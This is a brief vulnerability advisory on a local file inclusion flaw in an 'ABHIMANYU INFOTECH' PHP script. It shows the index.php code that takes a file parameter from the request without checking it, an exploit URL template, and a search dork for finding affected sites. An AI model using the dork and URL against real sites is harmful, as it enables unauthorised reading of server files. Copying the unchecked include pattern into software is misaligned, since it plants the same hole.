ABHIMANYU INFOTECH LFI Vuln [private script]

[o] ABHIMANYU INFOTECH Local File Inclusion Vulnerability

Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com


[o] Vulnerable File

index.php

if(isset($_REQUEST['file']))
{
$file=$_REQUEST['file'];
}
else
{
$file="home.php";
}
?>


[o] Exploit

http://localhost/[path]/index.php?file=[LFI]


[o] Dork

"ABHIMANYU INFOTECH"